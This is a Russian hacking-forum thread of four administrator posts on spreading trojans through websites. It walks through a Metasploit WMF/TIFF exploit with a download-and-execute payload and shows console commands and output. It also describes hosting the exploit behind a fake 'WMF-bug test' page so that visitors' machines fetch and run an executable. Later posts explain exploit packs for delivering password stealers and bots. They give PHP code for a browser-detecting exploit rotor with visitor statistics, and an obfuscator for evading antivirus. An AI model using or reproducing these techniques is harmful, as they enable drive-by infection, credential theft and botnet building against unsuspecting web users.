WebHuntersTeam

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » WebHuntersTeam » Вирусология » Раздача троя

Раздача троя

Страница: 1

Сообщений 1 страница 4 из 4

1

  • Автор: [VAMPIRE]
  • Администратор
  • [VAMPIRE]
  • Зарегистрирован: 2008-03-25
  • Приглашений: 0
  • Сообщений: 135
  • Уважение: +2
  • Позитив: +6
  • Провел на форуме:
    1 день 22 часа
  • Последний визит:
    2008-05-01 01:59:54

Наверно многие пользователи ПК с Windows, выходя в интернет, лазая по Web-сайтам или просто общаясь по аське, некоторое время, ничего не скачивая и не запуская, обнаруживали у себя различного рода вредоносные программы (вирусы), в последствии удаляли их антивирусом, ставили файрвол и спали спокойно, не задумываясь над тем, каким образом они проникли на Ваш компьютер.
Так было с Windows 2000, XP Sp1. Cетевые черви, эксплуатирующие уязвимости в сервисах DCOM, LSASS безпроблем сами проникали в Ваш компьютер, без каких либо действий с Вашей стороны (за исключением выхода в инет) превращая Ваш компьютер в компьютер-зомби или скрипткидисы, сканируя диапазоны IP-адресов на бажные (дырявые) сервисы, проникали на Ваш комп, делая, что их душе угодно (автороутер KAHT2).
Но вскоре вышел SP2 для Windows XP, пославший всех известных сетевых червей куда подальше, прикрывший все дыры в бажных сервисах. Все успокоились на некоторое время, но не тут то было, лазая по сайтам, ничего не скачивая и не запуская на Вашем компе через некоторое время, снова обнаруживается зараза. Вы спросите как это возможно? Как это происходит? Просто занимаясь Веб-серфингом, Вы не скачиваете exe, com, bat,cmd,scr – представляющие потенциальную угрозу (а если скачиваете, то проверяете антивирусом перед запуском), но вы скачиваете много других файлов разных форматов – html, графических, музыкальных, видео и других. Ну и что, скажете Вы, они же неисполняемые!? М..да и будете правы – они не исполняемые, они обрабатываемые Вашим браузером, системой.
(Прим.: опустим здесь уязвимости движка IE в выполнении каких либо скриптов, функций – это отдельная большая тема). Многие поняли к чему я клоню. До некоторого времени считалось, что картинки (файлы форматов jpg, wmf, tiff) не могут содержать вирус – теперь это не так. Могут! Ведь кто Вам мешает записать туда кусок исполняемого кода и когда такой файл будет обрабатываться системой (системной библиотекой) передать управление на тот кусок исполняемого кода? Вопрос в том, как туда передать управление? Правильно! Искать, находить и использовать уязвимости в обработке системой специально сгенерированных файлов, тем или иным образом компрометирующих систему (проще говоря, заставляющих систему дать сбой при их обработке). Что и было сделано уже до нас в 2004-2005 годах и делается и по сей день…

1.Выбираем уязвимость.

Будем использовать уязвимость в обработке метафайлов системной библиотекой shimgvw.dll, существующую во всех системах WINDOWS, начиная с версии 3.хх и не только.
Подробности уязвимости тут:
http://www.securitylab.ru/vulnerability/243581.php
http://www.xakep.ru//magazine/xa/086/066/1.asp
http://www.xakep.ru/post/29503/default.asp
http://www.xakep.ru/post/28680/default.asp
http://www.xakep.ru/post/29529/default.asp- патч, закрывающий дыру.

2.Наша задача: Залить посетителю сайта исполняемый файл и передать ему управление.

Наш клиент: Система не пропатченые Windows XP, XP SP1, XP SP2, 2000, 2003. ( Прим. Win2003 server при дефалтной настройке безопасности не пробивается).
Мы : Система Windows SP2 (тоже не патченая) с установленным пакетом Metasploit Framework v.2.6. для Cygwin (win32)

3. Подготовка.

Для начала определимся с хостом в инете, где будет лежать тот исполняемый наш файл, который будет скачан при заходе клиента на нашу WEB-страницу. Пусть это будет http://nash.site.ru например. У меня пока http://localhost. Определились (это параметр будущей начинки нашего сплоита, чтоб знал, что и откуда грузить).

4. Готовим ядовитый tiff - файл.
(содержащий эксплоит и начинку - загрузчик нашего экзешника)

Запускаем пакет (консоль MFV)
а) Выбираем сплоит (ie_xp_pfv_metafile):

+ -- --=[ msfconsole v2.6 [145 exploits - 75 payloads]

msf > ls
framework perl.exe.stackdump run_msfupdate userguide.pdf
framework.tar run_msfconsole run_msfweb
msf > cd framework
msfconsole: chdir: changed to directory framework
msf > use ie_xp_metafilemsf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile >

б)задаём параметры:

msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
LHOST -> 10.0.0.1
msf ie_xp_pfv_metafile >

в)Выбираем начинку, нам нужно скачать и исполнить, ок, нет проблем, посмотрим сначала что у нас есть из начинок.

msf ie_xp_pfv_metafile > ls payloads
Empty.pm linux_ia32_reverse_xor.pm
bsd_ia32_bind.pm linux_sparc_bind.pm
------ пропущено ---------------------------------------
cmd_unix_reverse_bash.pm win32_downloadexec.pm
------ пропущено ---------------------------------------
linux_ia32_reverse_udp.pm win32_reverse_vncinject.pm
msf ie_xp_pfv_metafile >

Win32_downlodexec - вот оно самое! Название начинки говорит само за себя, посмотрим по ней инфу

msf ie_xp_pfv_metafile > info win32_downloadexec

Name: Windows Executable Download and Execute
Version: $Revision: 1.1 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 340
Keys: noconn

Provided By:
lion[at]cnhonker.com
pita[at]mail.com

Available Options:
Options: Name Default Description
-------- ------ ------- ------------------------------
required URL Complete URL to the target EXE

Advanced Options:
Advanced (Msf::Payload::win32_downloadexec):
--------------------------------------------
Description:
Download an EXE from a HTTP URL and execute it

msf ie_xp_pfv_metafile >

Ага! Скачивает exe-файл с HTTP URL (c web-страницы по протоколу HTTP) и запуcкает его, то что надо!
Опция URL - там где распалагается наш экзешник. Не забудем её установить...
И так - берём эту начинку - она нам подходит.

msf ie_xp_pfv_metafile > set PAYLOAD win32_downloadexec
PAYLOAD -> win32_downloadexec
msf ie_xp_pfv_metafile(win32_downloadexec) >

г) Устанавливаем переменную URL (HTTP адрес нашего экзешника в инете, я локально запустил свой сервак Apache и кинул в корень экзешник VirtualGirl, в самораспаковывающемся архиве vr.exe - вируальные тёлки вылезающие справа экрана будут мне показывать стриптиз ;-))

msf ie_xp_pfv_metafile(win32_downloadexec) > set URL http://10.0.0.1/vg.exe
URL -> http://10.0.0.1/vg.exe
msf ie_xp_pfv_metafile(win32_downloadexec) >

д)Ну всё готово! Командуем exploit

msf ie_xp_pfv_metafile(win32_downloadexec) > exploit
[*] Waiting for connections to http://10.0.0.1:8080/

Подняли ещё один (помимо Апача) локальный WEB сервер на 8080 порту с нашим сплоитом. Заходим на него через браузер сами и автоматом скачиваем ядовитый tiff файл (благо настройка безопасности броузера IE6 это разрешает и не блокирует автоматическую загрузку tiff-файла)

[*] HTTP Client connected from 10.0.0.1:4401, redirecting...
[*] HTTP Client connected from 10.0.0.1:4403, sending 1500 bytes of payload...

Всё! Появлеяется красный значок "2" в трее и тёлки начинают периодически вылезать справа внизу экрана, весело танцевать и раздеваться, правда не доконца - версия триальная ;-(

ж) Разбираемся что же произошло и как это может быть? Был автоматически загружен ядовитый tiff-файл, содержащий наш сплоит и начинку (загрузчик), далее он был открыт программой просмотр факсов (была подгружена бажная dll не без помощи rundll32.exe, которая потеряла управление и передала его на наш загрузчик, он в свою очередь загрузил наших тёлок (файл vg.exe) с Web-сервера Апач и запустил, после чего они стали благополучно танцевать на моём рабочем столе ;-)
Находим наш ядовитый tiff - файл - это готовый наш эксплоит (содержит собсвенно сам сплоит, начинку загрузчик со всеми параметрами). Он лежит в c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\ Его имя типа что-то 1D5TRR3e0[1].tiff (размер всего 28Кб.) проверим Антивирусом Касперского этот файл. Он скромно нам сообщает о том, что файл "возможно является потенциально опасным ПО Exploit.Win32.IMG-WMF" всё так и есть на самом деле (наш загрузчик - не такая уж опасная начинка сполита, всё зависит от того что он грузит и запускает, а вместо наших, безобидно пляшущих тёлок, можно загрузить и троя ворующего пароли) Убъём процесс плящущих тёлок (VirtuaGirl2.exe,Vg.exe - был обычный самараспаковывающийся в system32\vg архив с последующим запуском самой проги VirtuaGirl2.exe) и попробуем просто посмотреть папку с ядовитым tiff файлом в стандартном проводнике Windows, Опс! Тёлки опять пляшут у нас на экране! (Снова подгрузилась бажная DLL c помошью rundll32.exe и сделала своё чёрное дело)! Всё проверено, наш подопытный Tiff-файл превратился в успешно исполняемый (на не пропатченных системах Win).

5. Вешаем сплоит в интернете на своём сайте.

Так как в параметре URL (для начинки загрузчика) мы указали http://localhost/vg.exe нам придётся пересобрать ядовитый Tiff файл с другими параметрами.
а) Выбираем что будем грузить (исполняемый exe-файл). Я взял картинку (женскую задницу с паутинкой на ней), открыл в фотошопе, дописал текст "Заштопайте дырку в Вашей системе", сохранил в формате JPG, затем открыл инфравьювером и сделал из неё исполняемый экзешник, обозвал его picture.exe.

б) Выбираем host в интернете.
Я зарегал себе сайт на народе http://vulnerabilitywmf.narod.ru/, на главной странице сделал ссылку на http://vulnerabilitywmf.narod.ru/Testwmf.html и обозвал её тест на WMF-баг.

в) Готовим новый ядовитый tiff-файл (см. п 4)
Всё делаем тоже самое, только задаём наш новый URL, где будет лежать наш picture.exe.

msf ie_xp_pfv_metafile(win32_downloadexec) > set URL http://vulnerabilitywmf.narod.ru/picture.exe
URL -> http://vulnerabilitywmf.narod.ru/picture.exe

Содержание Testwmf.html - это всего лишь переадресация на наш ядовитый tiff файл. Его содержание мы получим, если посмотрим HTМL код (когда будем открывать ссылку у себя с локально поднятого Metasploit`ом Framework WEB-сервера, нам лишь нужно изменить ссылку переадресации на народовскую и сохранить под именем Testwmf.html. Сам сформированный таким образом tiff- файл возьмём из c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\, обзовём Sploit.tiff. Закачаем в корневую папку нашего Web-сервера на народе эти два файла Testwmf.html, Sploit.tiff, а также не забудем наш picture.exe, который будет скачиваться с сайта, запускаться и выводить картинку о том что Ваша система уязвима к WMF-багу. Всё готово!

Содержание файла Testwmf.html

Код:
<html><meta http-equiv='refresh' content='0; 
URL=http://vulnerabilitywmf.narod.ru/Sploit.tiff'><body><div class='kMM5zm0Z82kjbGwPCrIz3s4NdTqA3q7AJIuWcqUXECe K25CbzHHCAD23COOjdba23A3UXfOV08bs3TyJadiD4HDQsi6Pl cTeIAPSZ8IAR7EyhZjGyaVHvma1m6bdhDQrsolEK0N3jAWSE7I 5Vdrka3Cm3Eh4xoZsCEoo99Dd0v26nnV5OMBUV1swSohhVQDhQ wP4DpaeBiUi3cAsYFeGwWBIYEVL9P0K7agPzmlqP4RuhYTxHs4 a7n89igzS9inVrxXM0fjjjMSH27Y3xdCPTK6VNo9N2M2FS58C4 1vzFuSXMEfclePUznS8L3bhULrn6fhQSgqgZHPgN1TrTPrUbOQ nRKkGdscYyVIMskJCjxBOTvn13XwhYBgKtTL7H6BDyH2PNwX3N CrK7giEXHKb4y7wL7oEavd1sI6gmalISNCesj0bg8DzmBPIV5n 7hWqHVfF9FvmwARRZkMnqiAAuX5nrJTY7lxJiOMF8V63rOnPz7 Mu86VBHwBQ2x8dqxIwQVmcSsPhjOOrBuP5YHVPAL0EZInI2z05 XP9Sm9GyX5E5cQwygO4zpTuBg1lHbKqRKSQTdLRl0M3zsPmBt7 jaUXI2WS3EIDvRGV22mA3VdCP7Yl9wjJj3f7xfKxBfLHJEMYBj 7Lg9hmyNLUfjyv3oTDndxsTMipsFZ3uXtlQRrGDa7IUjlbJLHP WV7KtPWxcVN2hpYWyO'></div>One second please...</body></html><!-- ><!-- "><!--'><!-- --></textarea></form>
</title></comment></a>
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<script language="JavaScript" src="http://bs.yandex.ru/show/163"></script>
<!-- mailto:spm111@yandex.ru -->

Это уже после того, как он был залит на народ.ру.

0

2

  • Автор: [VAMPIRE]
  • Администратор
  • [VAMPIRE]
  • Зарегистрирован: 2008-03-25
  • Приглашений: 0
  • Сообщений: 135
  • Уважение: +2
  • Позитив: +6
  • Провел на форуме:
    1 день 22 часа
  • Последний визит:
    2008-05-01 01:59:54

Что такое связка сплойтов?
Связка - это объединение сушествующих эксплойтов, преимущественно использующих "баги" в браузерах для загрузки ПО. Под ПО подразумеваются различные сборщики паролей, боты, форм грабберы и другие, вообщем, все что нужно для сбора информации с компьютера жертвы.

Что входит в состав связки?
В состав связки входит, сплойты под различные версии браузеров. Но это как бы не достаточно, для контроля эффективности использование связки, т.е. просмотра статистики по браузерам, осям, странам, рефферам и количеству "пробитых" браузеров. Реффер - это тот, чей трафф приходит на связку. В некоторых связках есть продвинутая система статистики, т.е. можно контролировать какой стране "грузить" тот или иное ПО, есть возможность блокировки пользователя в случаи удачного "прогруза" ПО, стоит так называемая система GeoIp, позволяющяя определять место нахождения "пользователя", приимущественно используется для бот нета.

Откуда берут сплойты для связки?
Наверно, все замечали, что разные связки продаются по разному, стоимость связки колеблиться от 100$ и до 2к и зависит не только от написанного "ротора" сплойтов, но так же от самих сплойтов. Сплойты можно найти на многих сайтах таких как:
milw0rm.com
securitylab.ru
securityfocus.com
На сайтах приводиться уведомление о той или иной уязвимости найденой в браузере, иногда вместе со сплойтом. Для дорогих связок используют приватные сплойты, которые в конечном счете и определяют стоимость связки. Приватные сплойты - это сплойты с доконца раскрученной уязвимостью, т.е. найдя уязвимость в браузере, например переполнения буфера, нужно еще доконца ее раскрутить чтобы получился download and executable.
Подробнее об это тут

Как определить эффективность связки?
Эффективность связки определяется количеством "пробива" браузеров. Обычно используется несколько сплойтов для разных браузеров и их версиий. В статистике работы связки может приводиться общяя пробиваемость, а так же по отдельным браузерам и версиям. На данный момент самый бажным браузером считается Internet explorer за ним следует Mozilla firefox и Opera.
Подробней можно прочитать здесь
http://s-teals.org/showthread.php?p=2860
Так же там рассматриваются следующие вопросы:
Что такое стата (статистика)
Что такое пробив.
Что такое трафф (траффик) и куда его гонят.
FAQ (общие вопросы возникающие у новичков)

На каком языке программирования можно написать связку?
Преимущественно это php, т.к. имеет большее распространение в глобальной сети. Но так же подходят все языки которые могут собирать информацию об клиентском браузере, такие как perl, javascript, asp, vb, c/c++ и другие. Подробное рассмотрение ротора сплойтов на javascript можно почитать в статье -=lebed=-
http://forum.antichat.ru/thread36997.html

Дополнительные линки по теме, чтобы расширить свой кругозор:
О загрузках - http://forum.antichat.ru/thread39361.html
Криптуем php скрипты от антивирей - http://forum.antichat.ru/thread27118.html
Что такое переполнение буфера? - http://forum.antichat.ru/thread26791.html

0

3

  • Автор: [VAMPIRE]
  • Администратор
  • [VAMPIRE]
  • Зарегистрирован: 2008-03-25
  • Приглашений: 0
  • Сообщений: 135
  • Уважение: +2
  • Позитив: +6
  • Провел на форуме:
    1 день 22 часа
  • Последний визит:
    2008-05-01 01:59:54

[пишем ротор эксплойтов]
Что же нам нужно для написания связки? Во первых, нам нужно ознакомиться с базывыми основами того языка на котором мы будем писать. Я возьму php, т.к. восновном все связки пишут с его использованием.

Материал для прочтения по php:
http://www.phprus.ru/
http://phpfaq.ru/docs
http://articles.org.ru/cn/?c=6 хороший сборник статей.
По гуглив минут 5 можно еще достать хорошего мануала по php.

Что же будет входить в нашу связку?
Ротор (главная страница)
Скрипт статистики
Эксплойты
Первым делом в странице index.php нам нужно определить, что за браузер, ip посетителя и проверить не заходил ли он уже ранее.

Код:
 $ip = getenv("REMOTE_ADDR"); 
$referer = substr(getenv("HTTP_REFERER"), 0, 40); 
$user_agent = getenv("HTTP_USER_AGENT");  

Дальше проверяем не заходил ли пользователь ранее (не будем рассматривать работу с бд, ограничемся файлами)
PHP код:
 if ($ip_bans==1) { 
 $ip_ban=getcwd().'/ip_ban.txt'; 
 $banfile=file($ip_ban); 
 $s=0; 
 for($i=0;$i<=count($banfile); $i++) { $ipban=trim($banfile[$i]); 
 if ($ip==$ipban) { 
 $s=1; 
 $i=count($banfile); }} 
 if ($s==1) { 
 include("error.php"); exit; } // показываем страницу ошибки если пользователь уже был. 
 else { 
 $tban=fopen("ip_ban.txt","a+b"); 
 fwrite($tban,$ip."\n"); 
 fclose($tban); }}  

Дальше начинается основной процесс - определение браузера и оси.
PHP код:
 if(eregi("(msie) ([0-9]{1,2})", $user_agent, $bv)) 
  { 
    $brow = "MSIE"; 
    $ver = $bv[2]; 
  } 
 elseif(strstr($user_agent, "Nav")) $brow = "Netscape"; 
 elseif(strstr($user_agent, "Firefox")) $brow = "Firefox"; 
 elseif(strstr($user_agent, "Opera")) $brow = "Opera"; 
 elseif(strstr($user_agent, "Lynx")) $brow = "Lynx"; 
 elseif(strstr($user_agent, "WebTV")) $brow = "WebTV"; 
 elseif(strstr($user_agent, "Bot")) $brow = "Bot"; 
 elseif(strstr($user_agent, "Konqueror")) $brow = "Konqueror"; 
 else $brow = "Other"; 

 # Detect System 
 if(strstr($user_agent, "Windows 95")) $os = "Windows 95"; 
 elseif(strstr($user_agent, "Win 9x 4.9")) $os = "Windows ME"; 
 elseif(strstr($user_agent, "Windows 98")) $os = "Windows 98"; 
 elseif(strstr($user_agent, "Windows NT 5.0")) $os = "Windows 2000"; 
 elseif(strstr($user_agent, "SV1")) $os = "Windows XP"; 
 elseif(strstr($user_agent, "Windows NT 5.1")) $os = "Windows XP"; 
 elseif(strstr($user_agent, "Windows NT 5.2")) $os = "Windows 2003"; 
 elseif(strstr($user_agent, "Windows NT 6.0")) $os = "Windows Vista"; 
 else $os = "Other";

Из мануалов видно, что $_SERVER['HTTP_USER_AGENT'] или $user_agent содержит основную информацию об оси браузере
Цитата:Элемент $_SERVER['HTTP_USER_AGENT'] содержит информацию о типе и версии браузера и операционной системы посетителя.

Вот типичное содержание этой строки: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)". Наличие подстроки "MSIE 6.0" говорит о том, что посетитель просматривает страницу при помощи Internet Explorer версии 6.0. Строка "Windows NT 5.1" сообщает, что в качестве операционной системы используется Windows XP.

теперь в $brow у нас будет "точное" название браузер и можем подключить эксплой под браузер

Код:
 if ($brow=="MSIE") 
  { 
    msie_stat(); // заносим в статистику браузера, функция должна быть опеределена где то в коде 
    include("exp/msie.php");// exploit для Эксплоера 
  } 

else 
  { 
    other_stat(); // ^^ 
    include 'error.php'; // Страница с ошибкой 
     }

так же можно добавлять и другие сплойты выражением

Код:
 elseif($brow=="Opera") 
  { 
    opera_stat(); //^^ 
    include("exp/opera.php"); 
  }

Теперь заносим ip и браузер в нашу статистику

Код:
 function msie_stat() // функция для Эксплоера. 
 { 
  $fm=fopen("brow.txt",'r'); 
  flock($fm,2); 
  $fr=fread($fm,filesize("brow.txt")); 
  list($ie,$ot)=explode("|",$fr); 
  $ie++; 
  flock($fm,3); 
  fclose($fm); 
  $mw=fopen("brow.txt",'w+'); 
  flock($mw,2); 
  fwrite($mw,$ie."|".$ot); 
  flock($mw,3); 
  fclose($mw); 
 }

Так же можем еще заносить в нашу статистику HTTP_REFERER это позволит там видеть откуда пришли на страницу.

attention
Цитата:Все переменные полученные от пользователя необходимо фильтровать! Так как их легко подделать, в результате возможны уязвимости типо sql injection (когда исп бд) и xxs.

0

4

  • Автор: [VAMPIRE]
  • Администратор
  • [VAMPIRE]
  • Зарегистрирован: 2008-03-25
  • Приглашений: 0
  • Сообщений: 135
  • Уважение: +2
  • Позитив: +6
  • Провел на форуме:
    1 день 22 часа
  • Последний визит:
    2008-05-01 01:59:54

[Прячем наш эксплоит]
Зачем нужно прятать эксплоит? Затем чтобы антивирусы не обнаружили, то что мы пытаемся загрузить ПО через браузер.
Сушествует много способов закодировать наш эксплоит одни из них это обфускация эксплоита.
Цитата:Обфускация (от лат. obfuscare, «затенять, затемнять») — запутывание кода программы, то есть приведение исходного текста или исполняемого кода к виду, сохраняющему функциональность программы, но затрудняющему анализ, понимание алгоритмов работы и модификацию при декомпиляции. «Запутывание» кода может осуществляться на уровне алгоритма, на уровне исходного текста, ассемблерного текста. Для создания запутанного ассемблерного текста могут использоваться специализированные компиляторы, использующие неочевидные или недокументированные возможности среды исполнения программы. Существуют также специальные программы, производящие обфускацию, называемые обфускаторами (англ. Obfuscator).
[forbidden link]

Пример обфускатора взятого из одной связки, код не полный.

Код:
 function replace_all($scr) { 
  $var_to_replace = 100; 
   
  for ($i=1; $i<=$var_to_replace; ++$i) 
    $search[] = '/var'.$i.'v/'; 
  for ($i=0; $i<$var_to_replace; ++$i) 
    $replace[] = random_str(rand(3,7)); 
   
  for ($i=1; $i<=$var_to_replace; ++$i) 
    $search[] = '/func'.$i.'f/'; 
  for ($i=0; $i<$var_to_replace; ++$i) 
    $replace[] = random_str(rand(5,9)); 
  
  $scr = preg_replace($search, $replace, $scr); 
  $scr = preg_replace_callback('/\[int:(\d+)\]/', "gen_int", $scr); 
  $scr = preg_replace_callback('/\[str:(.*?)\]/', "gen_str", $scr); 
  $scr = preg_replace_callback('/\[vb_str:(.*?)\]/', 'gen_str', $scr); 
  return $scr; 
} 
function random_str($length) { 
  global $unique_names; 
  $res = ''; 
  for ($i=0; $i<$length; ++$i) 
    $res .= chr(rand(97, 122)); 
  if (in_array($res, $unique_names)) $res = random_str($length); 
  $unique_names[] = $res; 
  return $res; 
} 

function int_to_items($n) { 
  $max_n_slogs = rand(2,$n); 
  $slogs = array(); 
  for ($i=0; $i<$max_n_slogs;++$i) 
    $slogs[] = rand(1,$n); 
  $cur = 0; 
  $sum = array_sum($slogs); 
  while ($sum != $n) { 
    if ($sum > $n && $slogs[$cur] > 0) --$slogs[$cur]; 
      else ++$slogs[$cur]; 
    ++$cur; 
    if ($cur >= $max_n_slogs) $cur = 0; 
    $sum = array_sum($slogs); 
  } 
  $res = array(); 
  foreach ($slogs as $s) 
    if ($s != 0) $res[] = $s; 
  return $res; 
} 


function gen_int($matches) { 
    $n = intval($matches[1]); 
    $slogs = int_to_items($n); 
    $s = implode('+', $slogs); 
    return $s; 
}

Так же часто применяется Zend Guard, для защиты исходного кода скрипта.
Цитата:Zend Guard (ранее назывался Zend Encoder) — позволяет закодировать скрипт в байт-код, который потом можно использовать точно также как и обычный, за исключением возможности его отредактировать. Предназначено для защиты интересов и интеллектуальной собственности разработчика. Для работы таких скриптов обязательно нужен Zend Optimizer.
http://ru.wikipedia.org/wiki/Zend

Некоторые предпочитают руками прятать эксплоиты, т.к. изменять саму подачу эксплоита. Изменяются названия переменных, используется кодирование не только php скриптов, javascript, но и html.

0

Страница: 1

Вы здесь » WebHuntersTeam » Вирусология » Раздача троя

создать форум